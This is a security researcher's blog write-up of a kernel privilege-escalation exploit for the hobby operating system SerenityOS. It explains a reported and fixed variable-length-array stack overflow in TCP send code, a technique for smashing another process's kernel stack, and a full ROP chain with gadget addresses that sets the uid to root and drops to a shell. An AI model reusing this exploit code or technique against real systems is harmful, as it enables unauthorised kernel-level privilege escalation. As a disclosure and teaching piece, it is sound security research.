
“Hello, Friends!”

Recently I have taken an interest in a project called SerenityOS. Stolen straight from the GitHub:

SerenityOS is a love letter to ’90s user interfaces with a custom Unix-like core. It flatters with sincerity by stealing beautiful ideas from various other systems.

Roughly speaking, the goal is a marriage between the aesthetic of late-1990s productivity software and the power-user accessibility of late-2000s *nix. This is a system by us, for us, based on the things we like.

It’s a surprisingly full-featured hobby operating system with quite a welcoming community behind it. It landed on my radar after a series of videos by LiveOverflow and Andreas (the developer) detailing a few exploits written during the 2020 hxp CTF, so I decided to explore the system myself. Eventually, I found a memory corruption bug in some networking code that could be leveraged into kernel-mode code execution.

The Bug

The vulnerability can be hit so easily by some bad code that I’m surprised it wasn’t found by a fuzzer immediately. At its core, it’s a stack overflow in the function TCPSocket::send_tcp_packet. To see how, let’s take a look at the implementation.

KResult TCPSocket::send_tcp_packet(u16 flags, const UserOrKernelBuffer* payload, size_t payload_size)
{
    const size_t buffer_size = sizeof(TCPPacket) + payload_size;
    alignas(TCPPacket) u8 buffer[buffer_size];
    new (buffer) TCPPacket;
    auto& tcp_packet = *(TCPPacket*)(buffer);
    ASSERT(local_port());
    tcp_packet.set_source_port(local_port());
    tcp_packet.set_destination_port(peer_port());
    tcp_packet.set_window_size(1024);
    tcp_packet.set_sequence_number(m_sequence_number);
    tcp_packet.set_data_offset(sizeof(TCPPacket) / sizeof(u32));
    tcp_packet.set_flags(flags);
    //...
    if (payload && !payload->read(tcp_packet.payload(), payload_size))
        return EFAULT;
    //...
    if (tcp_packet.has_syn() || payload_size > 0) {
        //...
        send_outgoing_packets();
        return KSuccess;
    }
    //...
}

This function is called when attempting to use the send() syscall on a TCP socket (naturally). None of the callers in the chain (Process::sys$sendmsg, IPv4Socket::sendto, and TCPSocket::protocol_send) do any bounds checking on the user-provided payload_size other than ensuring the value is in userspace. Unfortunately, a value being in userspace is quite a lax requirement when that value is then used to size a stack allocation. The problem line is:

alignas(TCPPacket) u8 buffer[buffer_size];

buffer is therefore a variable-length array (VLA), a really cursed feature from C99 (available in C++ only as a compiler extension) that is as bad as it sounds. It dynamically resizes the stack frame using the value we provided, which can do some very unexpected things when the value is larger than the stack (Serenity seems to use a kernel stack size of 2^16 bytes). We can thus easily obliterate the stack and trigger a crash by calling something to the effect of:

send(tcp_socket, user_buffer, 0xdeadaa, 0); //BOOM!
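To put rough numbers on that call, here is a minimal sketch of the allocation arithmetic. It assumes a 20-byte TCPPacket header and that the compiler rounds the VLA size up to a multiple of 16 bytes; the names vla_bytes and min_overshoot are made up for illustration and are not kernel identifiers.

```cpp
#include <cstdint>

// Kernel stack size quoted in the text (2^16 bytes).
constexpr uint32_t kernel_stack_size = 0x10000;
// ASSUMPTION: sizeof(TCPPacket) is 20 bytes (a TCP header without options).
constexpr uint32_t tcp_header_size = 20;

// Bytes taken off the stack pointer for a given payload size.
// ASSUMPTION: the compiler rounds the VLA size up to a 16-byte multiple.
constexpr uint32_t vla_bytes(uint32_t payload_size)
{
    return (tcp_header_size + payload_size + 0xf) & 0xfffffff0u;
}

// Lower bound on how far the stack pointer lands below the bottom of the
// stack. It is a lower bound because part of the stack is already in use
// by the time the allocation happens.
constexpr uint32_t min_overshoot(uint32_t payload_size)
{
    return vla_bytes(payload_size) > kernel_stack_size
        ? vla_bytes(payload_size) - kernel_stack_size
        : 0;
}

// The send() call above: 0xdeadaa payload bytes plus the header.
static_assert(vla_bytes(0xdeadaa) == 0xdeadc0, "rounded allocation size");
static_assert(min_overshoot(0xdeadaa) == 0xddadc0, "far past a 64 KiB stack");
```

Under those assumptions the stack pointer ends up at least roughly 14 MiB below the bottom of a 64 KiB stack, which is why the crash is immediate.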

This is all well and good, but can we actually do something useful with this? First and foremost, we need to make sure there’s no funny business going on with the allocation itself. Examining the code produced by gcc:

...
<+749>: test   eax,eax
<+751>: jg     0xc018a36f <Kernel::TCPSocket::send_tcp_packet(unsigned short, Kernel::UserOrKernelBuffer const*, unsigned long)+771>
<+753>: push   edx
<+754>: push   edx
<+755>: push   eax
<+756>: lea    eax,[ebx+0x1c3be4]
<+762>: push   eax
<+763>: call   0xc01e08e2 <__ubsan_handle_vla_bound_not_positive()>
<+768>: add    esp,0x10
<+771>: mov    eax,DWORD PTR [ebp-0x70]
<+774>: lea    esi,[ebp-0x58]
<+777>: add    eax,0xf
<+780>: and    eax,0xfffffff0
<+783>: sub    esp,eax
<+785>: lea    eax,[ebp-0x70]
...

It seems to do exactly as advertised: the size is rounded up to a multiple of 16 and subtracted from esp, and the shiny UB sanitizer that comes attached only checks that the bound is positive. So now that we can be confident the allocation itself won’t touch any memory, the next step is using it safely. Almost immediately after the allocation, our userspace buffer is copied into the kernel buffer:

if (payload && !payload->read(tcp_packet.payload(), payload_size))
    return EFAULT;

This could be bad news for us if we provided a valid buffer of that size, because the copy would at the very least hit the guard page below the stack and fail. But that’s a big if. Providing an invalid user buffer is totally fair game, too. How would the kernel know? What I mean by this is that our buffer isn’t as long as we say it is. As payload->read copies our bytes over, it faults when it reaches our unmapped memory. But this time the fault is on the user side, so the function exits gracefully on the kernel’s end.

u8* stack_smash = (u8*)mmap(nullptr, ST_BUFFER_LEN, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
...
send(socket_fd, stack_smash, send_len, 0); //send_len is much, much larger than ST_BUFFER_LEN!
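The effect of lying about the length can be modelled in plain userspace code. This is a toy sketch, not the kernel's copy routine: UserRegion, CopyResult and copy_until_fault are hypothetical names, and a real fault is replaced by a simple length comparison.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Toy stand-in for a user mapping: only `mapped_len` bytes are readable.
struct UserRegion {
    const uint8_t* base;
    size_t mapped_len;
};

struct CopyResult {
    size_t copied; // bytes that actually reached the destination
    bool faulted;  // true if the request ran past the mapping
};

// Model of a copy that stops at the end of the readable mapping. The bytes
// copied before the "fault" stay in the destination, and the caller only
// sees an error (EFAULT in the kernel's case).
CopyResult copy_until_fault(uint8_t* dst, const UserRegion& src, size_t requested)
{
    size_t copied = requested < src.mapped_len ? requested : src.mapped_len;
    std::memcpy(dst, src.base, copied);
    return CopyResult { copied, requested > src.mapped_len };
}
```

In this model, asking for far more bytes than are mapped writes exactly mapped_len bytes and then reports failure, which mirrors the controlled-length write described above.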

@patrickwardle has a nice visual of this regarding a similar idea on macOS:

[Image: macOS partial write]

This is wonderful, as this chain of events means we have:

  • A sub esp with a user-controlled value
  • An arbitrary write with another user-controlled value/length
  • A graceful exit

I reported the issue and it was fixed within 15 minutes. This guy is a beast!

Now we have all the tools necessary to exploit this :)

Exploitation

We essentially have an arbitrary write primitive, so first we must choose what to write to. We have to keep in mind that we are writing at an offset from the stack, though, which might make things a little unpredictable. Thankfully, there is little to no KASLR on the system (as far as I’ve seen), but general system noise and randomness make specific writes fairly difficult. That puts directly writing to a critical structure out of the question, but what about staying in the realm of the stack? As the bug is a stack overflow, we can’t write to anything already on our own stack (the allocation only grows downwards), but I did notice that the offsets between stacks seem to remain constant:

...
[#0 SystemServer(5:5)]: Created kernel stack: 0xc35df000
[#0 SystemServer(5:5)]: Created kernel stack: 0xc35f0000
[#0 SystemServer(5:5)]: Created kernel stack: 0xc3601000
[#0 SystemServer(5:5)]: Created kernel stack: 0xc3612000
...

The offset is 0x11000, which is just the stack size 0x10000 plus the guard page size 0x1000. And so, if we can’t write to our own stack… we can still write to another process’s stack fairly reliably. It then just becomes a case of winning a race between what the other process is doing and the write that we do. This is not a problem, however, as we control the ‘victim’ process, so we can just make it do something as trivial as call sleep, giving us an arbitrarily long race window. One final annoyance is some randomization that is applied whenever we make a syscall:

// Apply a random offset in the range 0-255 to the stack pointer,
// to make kernel stacks a bit less deterministic.
// Since this is very hot code, request random data in chunks instead of
// one byte at a time. This is a noticeable speedup.
if (g_random_byte_buffer_offset == RandomByteBufferSize) {
    get_fast_random_bytes(g_random_byte_buffer, RandomByteBufferSize);
    g_random_byte_buffer_offset = 0;
}
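The stack spacing from the log can be checked with a few lines of arithmetic. This is a minimal sketch using the logged addresses and the 0x10000 + 0x1000 spacing from the text; nth_stack and the constant names are illustrative, not kernel identifiers. The per-syscall offset of up to 255 bytes described in the comment above comes on top of these addresses.

```cpp
#include <cstdint>

constexpr uint32_t kernel_stack_size = 0x10000; // stack size from the text
constexpr uint32_t guard_page_size = 0x1000;    // guard page from the text
constexpr uint32_t stack_stride = kernel_stack_size + guard_page_size;

// Address of the stack `n` slots away from `base` (negative n walks down),
// ASSUMING the constant spacing seen in the log keeps holding.
constexpr uint32_t nth_stack(uint32_t base, int32_t n)
{
    // Unsigned wraparound makes negative n subtract whole strides.
    return base + static_cast<uint32_t>(n) * stack_stride;
}

// The four addresses from the log are exactly one stride apart.
static_assert(stack_stride == 0x11000, "stack plus guard page");
static_assert(nth_stack(0xc35df000, 1) == 0xc35f0000, "second logged stack");
static_assert(nth_stack(0xc35df000, 2) == 0xc3601000, "third logged stack");
static_assert(nth_stack(0xc35df000, 3) == 0xc3612000, "fourth logged stack");
static_assert(nth_stack(0xc3612000, -1) == 0xc3601000, "walking back down");
```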

This slight randomization to the stack bases makes writing to an exact address of the victim’s stack unreliable (granted, it could be brute-forced in a millisecond). But once again the stars align as the sleep syscall does not care very much about how the stack is laid out as it returns. During its call, it eventually reaches the function Processor::switch_context, which is the final stage before swapping contexts. In it, it does:

...
<+159>: pushf  
<+160>: push   ebx
<+161>: push   esi
<+162>: push   edi
<+163>: push   ebp
...
<+186>: push   eax
<+187>: push   edx
<+188>: push   ecx
<+189>: cld    
<+190>: jmp    0xc011b7d4 <enter_thread_context()>
<+195>: pop    edx
<+196>: pop    eax
<+197>: pop    ebp
<+198>: pop    edi
<+199>: pop    esi
<+200>: pop    ebx
<+201>: popf   
...
<+225>: lea    esp,[ebp-0xc]
<+228>: pop    ebx
<+229>: pop    esi
<+230>: pop    edi
<+231>: pop    ebp
<+232>: ret    
...

This is pretty much saving the state and restoring it afterwards. Crucially, it derives esp from a value saved on the stack (the popped ebp), then returns shortly after. Accuracy doesn’t matter here: we can just spray the stack with a new stack pointer and have it return from there… code execution!

At this point, we just need to put a ROP chain in some kernel memory and redirect the stack there. I chose to spray some heap memory with the ROP chain, but this part was extremely iffy. The offset between the current stack and the heap is not something I could reasonably predict, so I had to pretty much blast the entire heap with the chain. I used something like a nop sled but made of ret gadgets instead (a ret sled?) to make the ROP chain execution reliable, but it would still crash half the time if the offset was too large and I wrote to some bad memory. There’s probably a better way to store the ROP chain, but for my purposes it will suffice.
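The ret sled idea can be sketched as follows. This is an illustration under assumptions, not the exploit's actual code: the write_u32 signature is guessed from how it is called later in this post, build_ret_sled is a made-up helper, and the address of a bare ret gadget is left as a parameter.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Store one 32-bit value at *off in native byte order (little-endian on
// x86) and advance the offset. ASSUMED signature, not the original helper.
void write_u32(uint8_t* buf, size_t* off, uint32_t value)
{
    std::memcpy(buf + *off, &value, sizeof(value));
    *off += sizeof(value);
}

// Build `sled_slots` copies of the address of a bare `ret`, followed by the
// real chain. A stack pointer landing on any slot of the sled keeps popping
// the same `ret` address until it slides into the chain.
std::vector<uint8_t> build_ret_sled(uint32_t ret_gadget, size_t sled_slots,
                                    const std::vector<uint32_t>& chain)
{
    std::vector<uint8_t> buf((sled_slots + chain.size()) * sizeof(uint32_t));
    size_t off = 0;
    for (size_t i = 0; i < sled_slots; ++i)
        write_u32(buf.data(), &off, ret_gadget);
    for (uint32_t value : chain)
        write_u32(buf.data(), &off, value);
    return buf;
}
```

The sled only helps when the redirected stack pointer is 4-byte aligned relative to the sprayed data and actually lands inside it, which fits the crashes seen when the offset guess was too far off.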

The ROP chain I ended up with was very similar to the one in vakzz’s awesome exploit chain, writing root to our process’s permission bits.

write_u32(heap_smash, &off, 0xc0157c1e); //pop eax; ret;
write_u32(heap_smash, &off, 0xc0811000); //heap

write_u32(heap_smash, &off, 0xc011ccdc); //pop edx; ret;
write_u32(heap_smash, &off, 0xc02289ef); //Kernel::Process::current()

write_u32(heap_smash, &off, 0xc019092e); //mov dw [eax], edx; ret;

pad(heap_smash, &off, 0x41414141);       //stack padding

write_u32(heap_smash, &off, 0xc0157cec); //pop edi; pop ebp; ret;
write_u32(heap_smash, &off, 0xc0811018); //heap+0x18 
write_u32(heap_smash, &off, 0x00000000); //dummy 

write_u32(heap_smash, &off, 0xc0195672); //call dw [edi - 0x18]; ret;

write_u32(heap_smash, &off, 0xc011ccdc); //pop edx; ret;
write_u32(heap_smash, &off, 0x00000038); //uid offset

write_u32(heap_smash, &off, 0xc018f828); //add eax, edx; ret;

pad(heap_smash, &off, 0x42424242);       //stack padding

write_u32(heap_smash, &off, 0xc011ccdc); //pop edx; ret
write_u32(heap_smash, &off, 0x00000000); //root

write_u32(heap_smash, &off, 0xc019092e); //mov dw [eax], edx; ret

pad(heap_smash, &off, 0x43434343);       //stack padding

write_u32(heap_smash, &off, 0xc012476c); //cli; ret;
write_u32(heap_smash, &off, 0xc02611c8); //pop ds; cmc; dec ecx; ret;
write_u32(heap_smash, &off, ds);
write_u32(heap_smash, &off, 0xc013080f); //iretd; ret;
write_u32(heap_smash, &off, (u32)&shell);
write_u32(heap_smash, &off, cs);
write_u32(heap_smash, &off, flags);
write_u32(heap_smash, &off, (u32)(user_stack + 50*PAGE_SIZE));
write_u32(heap_smash, &off, ss);
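The last five values written after the iretd gadget form the frame that a 32-bit iretd pops when returning to a less privileged ring: EIP, CS, EFLAGS, ESP and SS, in that order. A small sketch of that layout, where IretFrame and make_user_frame are illustrative names rather than anything from the exploit or the kernel:

```cpp
#include <cstddef>
#include <cstdint>

// Stack layout consumed by a 32-bit iretd that switches privilege level,
// lowest address first.
struct IretFrame {
    uint32_t eip;    // where userspace resumes (&shell in the chain)
    uint32_t cs;     // user code segment selector
    uint32_t eflags; // flags to restore
    uint32_t esp;    // user stack pointer
    uint32_t ss;     // user stack segment selector
};

static_assert(sizeof(IretFrame) == 20, "five dwords, no padding");
static_assert(offsetof(IretFrame, esp) == 12, "esp is the fourth dword");

// Hypothetical helper that packs the five values in the order iretd
// expects them.
constexpr IretFrame make_user_frame(uint32_t entry, uint32_t cs, uint32_t eflags,
                                    uint32_t user_esp, uint32_t ss)
{
    return IretFrame { entry, cs, eflags, user_esp, ss };
}
```

Read against the chain, the shell address, cs, flags, the user stack pointer and ss fill these five slots in order.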

The final step was just compiling all this into a working exploit. To summarize,

  • There is a stack overflow in TCPSocket::send_tcp_packet that gives an arbitrary write from an offset off the stack
  • We can reliably write to a stack below ours, for example a stack owned by a child process
  • Calling sleep gives ample time to smash its stack and have it use our own stack pointer and thus return pointer
  • ROP our way to victory

My final-ish exploit code can be found here.

Conclusion

Tinkering around with both the SerenityOS kernel and its JS engine has been a blast, and I hope to return to them in the future, especially when the JS engine is more fleshed out. I’d also like to thank Andreas for answering my questions about his system very patiently :P Hope you enjoyed this little blurb about making a kernel exploit.